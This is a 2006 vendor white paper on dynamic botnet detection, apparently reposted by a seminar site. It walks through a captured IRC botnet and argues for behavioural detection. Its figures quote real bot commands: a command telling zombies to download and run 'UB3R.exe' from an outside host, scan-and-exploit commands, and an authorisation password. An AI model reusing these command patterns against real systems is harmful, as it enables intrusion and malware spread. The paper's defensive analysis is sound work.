Dynamic Botnet Detection - 123seminarsonly.com · Dynamic Botnet Detection These exploits are...

Dynamic Botnet Detection

Version 1.1

2006-06-13


Overview The widespread adoption of broadband Internet connections has enabled the birth of a new threat against both service providers and the subscribers they serve. Botnets – vast networks of compromised PCs under the control of a single master – possess the ability to launch crippling denial of service attacks, send vast quantities of unsolicited e-mail messages, and infect thousands of vulnerable systems with privacy-violating spyware and other forms of malicious software.

By design, botnets are difficult to detect and even more challenging to stop as their dynamic and adaptive capabilities permit them to easily circumvent traditional means of detection and mitigation.

With the failure of port- and signature-based technologies, service providers are being forced to adopt new approaches in the effort to address this growing threat. By using botnets’ very nature as an indicator of their presence, behavior-based detection and mitigation approaches are vital weapons in the ongoing battle to clean up broadband networks.

In this paper, using a real-world example, we outline the birth of a typical botnet. While doing so, we explain the shortcomings of traditional approaches that rely on port and signature matches. This analysis is followed with an introduction to behavioral techniques that look for the telltale signs of botnet presence in order to trigger mitigation measures.

Botnets Exposed A more complete understanding of how botnets operate is imperative in formulating and delivering effective protection mechanisms for providers and subscribers.

Bot and Exploit Selection

Botnets typically begin when an individual, who becomes known as a “botmaster”, downloads a bot program and exploit code. The botmaster need not be acting alone; in fact, criminal investigations have begun to link botnets with organized crime syndicates, so the problem is by no means isolated to a handful of individuals acting alone.

Bot programs such as AgoBot, SGBot, and IRCBot are freely available on the Internet, as is exploit code, making armed bot creation a simple affair. Generally, exploits for Microsoft’s Windows operating systems are selected.

www.sandvine.com 2006-06-13

2 of 14


These exploits are attractive both due to the sheer number of security exploits available and the widespread adoption of Windows amongst business and residential users.

By simply plugging the exploit code into the ready-to-use bot software, the botmaster creates a weapon capable of infecting and assuming control of vulnerable systems, the vast majority of which will belong to unsuspecting residential broadband subscribers.

Residential subscribers have long been regarded as a weak link in network security, as a relatively small number of users possess the technical knowledge or threat awareness to attempt to secure their systems. With the continuing growth of broadband Internet connections, residential networks have quickly become a buffet for malware authors and distributors.

Control Plane

After selecting the bot and exploit combination, the botmaster must now set up one or more control planes. The most common technique is to use public IRC servers to control the botnet, although other options are certainly available. While investigating a distributed denial of service attack against the Million Dollar Homepage, we discovered that the control system was a hijacked web server issuing instructions to the attacking botnet through encrypted HTTP strings. Other frequently used control planes include HTTPS, SMTP, Proprietary UDP, and TCP.

The botmaster needs a control plane in order to issue commands to and receive feedback from the botnet. By using this approach, it becomes a trivial matter to coordinate activities across thousands of distributed machines while keeping tabs on the status of the network itself.

Control planes are frequently moved to avoid detection; it is a trivial matter for the botmaster to direct the army to a different location.

Initial Infection and Army Expansion

The botmaster must now begin to build the zombie army that will comprise the botnet. Using the chosen exploit, the botmaster breaches and takes control over a handful of systems, as shown in Figure 1.


3 of 14

http://www.sandvine.com/general/sos_dl.asp?fileID=1

http://www.sandvine.com/general/sos_dl.asp?fileID=1


Figure 1 - Botmaster breaches initial targets

Once a machine is compromised, it immediately begins listening on the control plane for instructions. During the botnet’s infancy, systems are usually only instructed to automatically search for and penetrate additional machines.

Figure 2 - Zombies begin to infect other systems


4 of 14


Generally, regardless of the other activities in which a particular zombie PC is engaged, there is always the background activity of scanning for new “recruits”. Each system is capable of scanning thousands of IP addresses per minute, so even if only one PC in a hundred is vulnerable to a particular exploit, botnets can rapidly grow in size to number in the tens of thousands.

Each compromised system connects back to the control plane to await further instructions. At this stage, the botmaster has a single point of control over an army of broadband-connected PCs.

Figure 3 - Botnet is complete

Performing Updates

In addition to providing a convenient means of sending instructions to the army, the control plane also allows the botmaster to rapidly disseminate code and exploit updates - abilities that are paramount to any botnet remaining active.

There are a number of reasons for which a botmaster may need to update the botnet. It may be necessary to modify the bot code itself to avoid detection by devices applying signatures to packets and flows, or perhaps the botmaster desires to impart additional functionality to the army (new commands, new attack vectors, optimized scanning algorithms etc.).


5 of 14


In the example in Figure 4 below, the botmaster has used the control channel to instruct the bots to download new exploit code. This activity is commonplace, as Antivirus vendors rapidly create new signatures and users gradually patch their systems against particular attacks. By changing the exploit used to compromise systems, the botmaster can ensure that the army continues to grow despite the best efforts of the Antivirus community.

Figure 4 - Captured network trace of botnet update command

Frames 1, 2, 3, 4, 10 and 11 are the control channel and show the communication between the botmaster and the zombie PCs.

The command sent to the army instructs each zombie to download an exploit called “UB3R.exe” and then reload the bot process (on the compromised system) so that the exploit becomes active. The precise command issued to the army can be seen in Figure 5 to be:

.ft http://n0w.<domain>.fr/UB3R.exe c:\Reload.exe 1 –s

Figure 5 - Command to download and install a new exploit

Frames 5, 6, 7, 8, 9, 12, 13 and 14 in Figure 4 show the subscriber PC executing the botmaster’s command. The relevant HTTP level details extracted from the frames are shown in the figures below.

GET /UB3R.exe HTTP/1.0 User-Agent: Mozilla/4.0 (compatible)


6 of 14


Host: n0w.xxx.fr

Figure 6 - HTTP GET request from zombie to server

HTTP/1.1 200 OK

Figure 7 - Server response to GET request

MZ......................@............................................ ...!..L.!This program cannot be run in DOS mode. $.........H...&...&...&...'...&.W.{...&...*...&...(...&...- ...&...,...&.......&.Rich..&.........PE..L...'..D..............SR.0.. .........p [email protected].............................. ....................P................................................ ....................................p...............................t ext............................... ..`.rdata..............................@[email protected]...!>...0............ [email protected]...................... ....adata.......p

Figure 8 - Exploit being downloaded (binary data shown in ASCII format)

After restarting the bot process, the systems must now reconnect to the control plane using the same exchange used when they initially become part of the botnet. A conversation showing a zombie rejoining the botnet and receiving an initial set of commands is shown in Figure 9.

Figure 9 - Zombie joining the botnet and receiving first set of commands


7 of 14


Frames 1-12 contain the session establishment and standard IRC overhead during a connection. The zombie in this capture connects to an IRC channel called “U3BR”, the same name as the exploit downloaded only a few seconds previously.

Figure 10 shows the IRC command to join the botnet:

JOIN #UB3R

Figure 10 - IRC command to join the botnet channel

As stated previously, IRC is one of the most common means by which botmasters control botnets. IRC is incredibly attractive as a control plane as there are many IRC servers available on the Internet. Furthermore, any commands entered on a channel are broadcast to all zombies who have joined.

Note that the botnet in this paper is not using the default IRC port (tcp/6667). Instead, it is bound to a non-standard port, tcp/4000. Consequently, commonly used approaches such as simplistic ACL and firewall policies will prove completely ineffective in stopping this botnet.

Attacks

Once an army is established, the botmaster can begin to carry out attacks. An attack can be as prominent as using the combined might of the army to knock a particular website offline, or as subtle as installing spyware or spam Trojans on compromised machines.

In this particular instance, the botmaster has elected to compromise additional machines using an older Microsoft IIS Server buffer overflow attack known as ASN1HTTP.

The attack itself is begun with the zombies receiving an instruction to execute an “advanced scan” to look for servers vulnerable to the ASN1HTTP attack. The actual command, shown in Figure 11, is:

#advscan asn1http 125 5 999 128.x.x.x –r


8 of 14


Figure 11 - Command to scan for exploitable systems

A password is then transmitted to the zombies. This technique is a common way to prevent people who might stumble upon the control channel from taking over or affecting the botnet. The password command is:

#auth und3r –s

Figure 12 - Authorization command

Finally, the command to begin the search and attack is transmitted:

#scanall –a –r –s

Figure 13 - Command to start attack

The zombies begin scanning and exploiting any vulnerable targets found.

By looking at the timestamps in Figure 14, we can see that it only takes approximately two seconds to complete the exploit of a vulnerable target.


9 of 14


Figure 14 - Target is found and attack is completed

In the figure below, we look into a frame to see the buffer overflow attack.

Figure 15 - Buffer overflow attack

Each time a system is exploited, the IP address of the target is transmitted back to the botmaster through the IRC channel.


10 of 14


Figure 16 - Zombie reports back to botmaster

The ultimate objective of the botmaster is not known; however, with the increase in phishing scams it is plausible that the botmaster wants to seize control over well-connected servers in order to host scam websites.

It is also not uncommon for botmasters to simply compile lists of exploited systems in order to sell or rent out the network to third-parties (for use in denial of service attacks, spam networks, or a host of other malicious activities).

Implications for Service Providers During the attack examined in this paper, a single zombie was able to successfully exploit 206 systems in 188 seconds, a rate of slightly more than one infected host per second. Considering the fact that a typical botnet numbers in the thousands, it is easy to see the concern these botnets can cause network service providers.

Even if a particular botnet only has control over a few hundred residential systems on a particular POP on a provider network, the combined might of these systems using their bandwidth to launch a denial of service attack against an external target can easily cripple the POP, causing service disruptions for thousands of subscribers. These subscribers will often turn to the provider’s help desk for support, even if they themselves are participating in the attack, however unknowingly.

Furthermore, attacks and huge volumes of spam sourced from a particular provider cause that provider to be perceived as a source of malicious traffic, which can result in having their address space blocked by other providers either directly or via the many blacklists available on the Internet.


11 of 14


Finding the Botmaster Locating the botmaster is generally extremely challenging. In order to evade detection, zombies almost always connect to control channels that are not owned by the botmaster. Often, these are public IRC servers or private servers that have been hijacked for use in the botnet. Adding to the complexity is the fact that the botmaster typically proxies the control session through a number of compromised machines that are distributed across numerous networks and providers, as shown in Figure 17.

Figure 17 - Typical path to botmaster

These proxy connections are changed with relative frequency, so attempts to trace back to the source are usually unsuccessful and the control plane itself is routinely changed with a single command issued.


12 of 14


Connections established through “onion routing” such as the Tor network further compound the problem faced by network forensic and tracking operations.

As a consequence of all these evasive techniques, successfully determining the botmaster’s identity requires an immense amount of cooperation and efficient coordination across service providers, private sector companies, law enforcement personnel, and technical experts, not to mention a good deal of luck.

Limitations of Traditional Techniques Detecting and mitigating botnets is not a trivial matter, as botnets are a dynamic and ever-evolving threat. The rapid update capabilities allow botmasters to continually modify the zombie exploit code, control channel, and compromised devices along the control channel (choose a different exploit, pad the code with “filler”), rapidly rendering static signatures largely ineffective.

Furthermore, “port hopping” prevents the use of simple port blocks. In the example considered in this paper, blocking tcp/4000 would simply cause the botnet to select a different port within a few minutes. Additionally, the use of non-standard ports means that simple port-blocking is no longer effective. For example, a control plane using tcp/80 or tcp/433 cannot be blocked without stopping the widely used HTTP and HTTPS protocols.


13 of 14


Conclusions Botnets, although quite simple in design, are effective attack tools. They provide massive amounts of bandwidth to an individual, provide cover from tracking the botmaster, and are easily capable of evading static signature and port-based blocking measures.

Intelligent techniques that rely on behavioral analysis offer the only effective means of detecting and defending against the proliferation of botnets. Bots, much like worms, behave in a predictable manner, such as scanning for new hosts to infect, transmitting payloads to target machines, and engaging in attacks. By detecting these activities and applying them against policy heuristics, as was the case in the example considered herein, it is possible to identify bots and implement policies to mitigate the further spread of infection.

In this manner, providers can eliminate vast sources of spam and damaging DoS attacks, while protecting end subscribers from the invasion of privacy and consumption of system resources attributable to a bot hijacking.

If you are interested in learning more about Sandvine Intelligent Broadband Network products and services, please contact us at [email protected].


14 of 14

mailto:[email protected]

www.sandv

Sandvine Incorporated Waterloo, Ontario, CanadaPhone: +1 519 880 2600 Fax: +1 519 884 9892
ine.com

15 of 14

Sandvine Limited Basingstoke, U.K. Phone: +44 (0) 1256 698021 Fax: +44 (0) 1256 698245
http://www.sandvine.com • email: [email protected]
2006-06-13

Dynamic Botnet Detection - 123seminarsonly.com · Dynamic Botnet Detection These exploits are...

Documents

Transcript of Dynamic Botnet Detection - 123seminarsonly.com · Dynamic Botnet Detection These exploits are...